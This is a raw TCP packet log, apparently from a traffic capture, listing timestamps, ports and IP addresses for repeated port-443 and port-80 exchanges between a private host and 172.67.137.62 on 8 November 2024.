                                                                                                        Nov 8, 2024 11:11:05.946671009 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.947468042 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.947468042 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.947858095 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.948132038 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.948743105 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.949225903 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.949609041 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.949609041 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.950280905 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.950280905 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:06.127965927 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:06.128539085 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:06.128921032 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:06.129112959 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:06.129303932 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:06.129499912 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:06.129674911 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:06.129724026 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:06.129724026 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:06.129914999 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:06.129914999 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:06.130096912 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:06.130096912 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:06.130106926 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:06.130526066 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:06.131666899 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:06.131666899 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:06.131855011 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:06.132262945 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:06.133029938 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:06.133219957 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:06.133219957 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:06.133410931 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:06.133410931 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:06.133605003 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:06.133606911 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:06.134215117 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:06.134215117 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:06.134407997 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:06.134414911 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:06.134417057 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:06.134840012 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:06.134849072 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:06.135385036 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:06.135571957 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:06.135762930 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:06.135956049 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:06.135966063 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:06.135967970 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:06.135968924 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:06.137329102 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:06.137521029 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:06.137521029 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:06.137689114 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:06.137695074 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:06.138170958 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:06.138933897 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:06.138933897 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:06.139317989 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:06.139327049 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:06.139329910 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:06.139332056 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:06.140268087 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:06.140455008 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:06.140644073 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:06.140644073 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:06.140836000 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:06.140935898 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:06.141024113 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:06.142163038 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:06.142353058 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:06.142540932 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:06.142541885 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:06.143023014 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:06.143789053 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:06.143798113 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:06.143979073 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:06.144169092 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:06.144975901 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:06.144985914 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:06.145358086 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:06.145358086 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:06.145550966 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:06.146544933 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:06.146554947 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:06.146557093 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:06.146924019 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:06.147109985 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:06.147917032 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:06.147917032 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:06.148111105 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:06.148711920 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:06.148715019 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:06.149838924 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:06.149838924 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:06.149851084 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:06.150029898 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:06.150219917 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:06.150899887 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:06.151082993 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:06.151083946 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:06.151272058 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:06.151272058 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:06.151273012 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:06.151273012 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:06.344300985 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:06.344681978 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:06.344971895 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:06.346108913 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:06.346302032 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:06.346302032 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:06.346302032 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:06.346302032 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:06.346314907 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:06.346317053 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:06.346493959 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:06.347680092 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:06.347680092 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:07.285119057 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:07.291822910 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:07.346110106 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:10.266518116 CET49781443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:10.267534018 CET44349781172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:10.268610954 CET49781443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:10.268795967 CET49781443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:10.269243956 CET44349781172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:10.478988886 CET44349781172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:10.483592033 CET49781443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:10.484297991 CET44349781172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:10.485656977 CET49781443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:10.485995054 CET44349781172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:11.292859077 CET44349781172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:11.292860985 CET44349781172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:11.294066906 CET49781443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:11.294403076 CET49781443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:11.318644047 CET49782443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:11.318664074 CET44349782172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:11.318903923 CET49782443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:11.319044113 CET49782443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:11.319050074 CET44349782172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:11.528191090 CET44349782172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:11.529227018 CET49782443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:11.529233932 CET44349782172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:11.529470921 CET49782443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:11.529474974 CET44349782172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:12.334422112 CET44349782172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:12.334466934 CET44349782172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:12.334764004 CET49782443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:12.335068941 CET49782443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:14.230925083 CET49783443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:14.230950117 CET44349783172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:14.231362104 CET49783443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:14.231745958 CET49783443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:14.231750965 CET44349783172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:14.352035046 CET4978480192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:14.440996885 CET44349783172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:14.442353010 CET49783443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:14.442358971 CET44349783172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:14.442553043 CET49783443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:14.442558050 CET44349783172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:14.454001904 CET8049784172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:14.454277992 CET4978480192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:14.454435110 CET4978480192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:14.556467056 CET8049784172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:15.008429050 CET44349783172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:15.008467913 CET44349783172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:15.008665085 CET49783443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:15.008985996 CET49783443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:15.130614042 CET8049784172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:15.130621910 CET8049784172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:15.130628109 CET8049784172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:15.130984068 CET4978480192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:57.911756992 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:57.911792040 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:57.912040949 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:57.929757118 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:57.929771900 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:58.170021057 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:58.170557976 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:58.171663046 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:58.171674013 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:58.171967983 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:58.197824001 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:58.243962049 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:59.050246954 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:59.050304890 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:59.050331116 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:59.050380945 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:59.050487041 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:59.050508022 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:59.050636053 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:59.093434095 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:59.291347980 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:59.291383982 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:59.291420937 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:59.291548967 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:59.291567087 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:59.291697025 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:59.291699886 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:59.291750908 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:59.291852951 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:59.291996956 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:59.343406916 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:59.534621000 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:59.534673929 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:59.534699917 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:59.534740925 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:59.534786940 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:59.534892082 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:59.534975052 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:59.534980059 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:59.534981966 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:59.535284042 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:59.761358023 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:59.761957884 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:59.762307882 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:59.762320042 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:59.762795925 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:59.763087034 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:59.763092041 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:59.763524055 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:59.763788939 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:59.763792992 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:59.764290094 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:59.764517069 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:59.764522076 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:59.765132904 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:59.765296936 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:59.765300989 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:59.765847921 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:59.766037941 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:59.766041994 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:59.767416954 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:59.767607927 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:59.767611980 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:59.771616936 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:59.771770954 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:59.771778107 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:59.771900892 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:00.003935099 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:00.004125118 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:00.004174948 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:00.004451990 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:00.004462004 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:00.004789114 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:00.005688906 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:00.005917072 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:00.006495953 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:00.006727934 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:00.008143902 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:00.008343935 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:00.009567976 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:00.009759903 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:00.009769917 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:00.010030985 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:00.010397911 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:00.010606050 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:00.062045097 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:00.243786097 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:00.243793964 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:00.243971109 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:00.243979931 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:00.244189978 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:00.244201899 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:00.244385004 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:00.244901896 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:00.245115042 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:00.245176077 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:00.245187044 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:00.245656967 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:00.246181965 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:00.246491909 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:00.247456074 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:00.247596025 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:00.247711897 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:00.248336077 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:00.248517990 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:00.250135899 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:00.250325918 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:00.250334978 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:00.250456095 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:00.251200914 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:00.251755953 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:00.480274916 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:00.480535984 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:00.481589079 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:00.481812954 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:00.482999086 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:00.483211994 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:00.483902931 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:00.484085083 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:00.484085083 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:00.485522032 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:00.485707045 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:00.486903906 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:00.487145901 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:00.487860918 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:00.488075018 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:00.489245892 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:00.489464998 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:00.490104914 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:00.490295887 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:00.491545916 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:00.491765976 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:00.722675085 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:00.722892046 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:00.723993063 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:00.724288940 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:00.724298954 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:00.724550009 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:00.725472927 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:00.725709915 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:00.726408005 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:00.726581097 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:00.726632118 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:00.727967024 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:00.728162050 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:00.730065107 CET44349786172.67.137.62192.168.11.30
